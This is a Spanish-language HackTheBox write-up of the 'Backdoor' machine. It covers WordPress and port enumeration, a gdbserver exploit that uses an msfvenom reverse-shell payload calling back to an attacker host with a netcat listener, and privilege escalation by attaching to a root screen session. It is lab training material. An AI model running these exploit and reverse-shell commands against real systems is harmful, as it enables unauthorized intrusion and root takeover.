Backdoor es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Linux.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Backdoor 10.10.11.125 a /etc/hosts como backdoor.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
# Nmap 7.92 scan initiated Wed Dec 29 11:59:58 2021 as: nmap -sV -sC -p- -oA enumeration/nmap2 10.10.11.125 Nmap scan report for backdoor.htb (10.10.11.125) Host is up (0.050s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA) | 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA) |_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-generator: WordPress 5.8.1 |_http-title: Backdoor – Real-Life 1337/tcp open waste? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Dec 29 12:00:41 2021 -- 1 IP address (1 host up) scanned in 43.49 seconds |
Observamos varios puertos así que vamos a ver que podemos encontrar en cada uno de ellos.
Enumeracion
Ya se ve en la propia enumeración que hay un portal web con el cms wordpress y cuya versión es la 5.8.1, accedemos al portal y encontramos la siguiente pantalla
Vista ya la versión vamos a hacer varias enumeraciones a ver que podemos encontrar, como enumeración de directorios con gobuster
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
$ gobuster dir -u http://backdoor.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 150 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://backdoor.htb/ [+] Method: GET [+] Threads: 150 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/12/29 11:56:59 Starting gobuster in directory enumeration mode =============================================================== /wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/] /wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/] /wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/] /server-status (Status: 403) [Size: 277] =============================================================== 2021/12/29 11:58:44 Finished =============================================================== |
Exploits disponibles
1 2 3 4 5 6 7 8 9 |
$ searchsploit Wordpress 5.8.1 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results |
O escaneo con la tool wpscan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 |
$ wpscan --url http://backdoor.htb --api-token sxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.20 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://backdoor.htb/ [10.10.11.125] [+] Started: Wed Dec 29 12:04:37 2021 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://backdoor.htb/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09). | Found By: Rss Generator (Passive Detection) | - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator> | - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator> | | [!] 1 vulnerability identified: | | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate | Fixed in: 5.8.2 | References: | - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d | - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/ticket/54207 [+] WordPress theme in use: twentyseventeen | Location: http://backdoor.htb/wp-content/themes/twentyseventeen/ | Latest Version: 2.8 (up to date) | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt | Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 2.8 (80% confidence) | Found By: Style (Passive Detection) | - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:01 <============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:01 [i] No Config Backups Found. [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 2 | Requests Remaining: 23 [+] Finished: Wed Dec 29 12:04:46 2021 [+] Requests Done: 175 [+] Cached Requests: 5 [+] Data Sent: 44.419 KB [+] Data Received: 518.888 KB [+] Memory used: 241.133 MB [+] Elapsed time: 00:00:09 |
Revisando y buscando en google vemos alguna opción pero nada relevante en este punto así que pasamos a revisar el puerto 1337 correspondiente a gdbserver y encontramos un exploit en python para explotar el mismo y conseguir acceso a la máquina.
Así que siguiendo la ayuda del exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
$ python3 gdbexploit.py -h Usage: python3 gdbexploit.py <gdbserver-ip:port> <path-to-shellcode> Example: - Victim's gdbserver -> 10.10.10.200:1337 - Attacker's listener -> 10.10.10.100:4444 1. Generate shellcode with msfvenom: $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin 2. Listen with Netcat: $ nc -nlvp 4444 3. Run the exploit: $ python3 gdbexploit.py 10.10.10.200:1337 rev.bin |
En primer lugar generaremos nuestra shellcode
1 2 3 4 5 6 |
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 PrependFork=true -o rev.bin [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 92 bytes Saved as: rev.bin |
Levantamos nuestra escucha con netcat y lanzamos el exploit
1 2 3 4 5 |
$ python3 gdbexploit.py 10.10.11.125:1337 ../payloads/rev.bin [+] Connected to target. Preparing exploit [+] Found x64 arch [+] Sending payload [*] Pwned!! Check your listener |
Y obtendremos acceso con el usuario user en la máquina
1 2 3 4 5 |
$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.10.14.6] from backdoor.htb [10.10.11.125] 56906 id uid=1000(user) gid=1000(user) groups=1000(user) |
Obteniendo la flag de user
Ahora que ya tenemos acceso, obtenemos una shell con python y cogemos nuestra flag
1 2 3 4 5 6 7 8 |
user@Backdoor:/home/user$ ls -l ls -l total 4 -rw-r----- 1 root user 33 Dec 29 10:57 user.txt user@Backdoor:/home/user$ cat user.txt cat user.txt 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9 user@Backdoor:/home/user$ |
Escalado de privilegios
Para escalar privilegios revisamos los ficheros existentes, permisos, procesos, etc… y encontramos un proceso interesante con pspy
1 2 3 |
user@Backdoor:/home/user$ ps aux|grep screen ps aux|grep screen root 859 0.0 0.0 2608 1600 ? Ss 10:57 0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done |
El cual además se ejecuta cada cierto tiempo mediante un cron como root, por lo que puede ser una opción.
Tratamos de ejecutar el mismo y nos da un error debido a que no tenemos definido ningún tipo de terminal a utilizar
1 2 3 |
user@Backdoor:/home/user$ screen screen Please set a terminal type. |
Así que exportamos la variable TERM con un tipo de terminal
1 2 |
user@Backdoor:/home/user$ export TERM=xterm export TERM=xterm |
Y lanzamos screen accediendo a un screen, previamente creado, del usuario root y cuyo nombre del screen es también root para conseguir escalar al mismo
1 2 3 4 |
user@Backdoor:/home/user$ screen -x root/root root@Backdoor:~# id id uid=0(root) gid=0(root) groups=0(root) |
Obteniendo la flag de root
Ahora que ya somos root sólo nos queda obtener nuestra flag
1 2 3 4 5 6 7 8 |
root@Backdoor:~# ls -l ls -l total 4 -rw-r--r-- 1 root root 33 Dec 29 10:57 root.txt root@Backdoor:~# cat root.txt cat root.txt 9xxxxxxxxxxxxxxxxxxxxxxxxxxxx0 root@Backdoor:~# |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace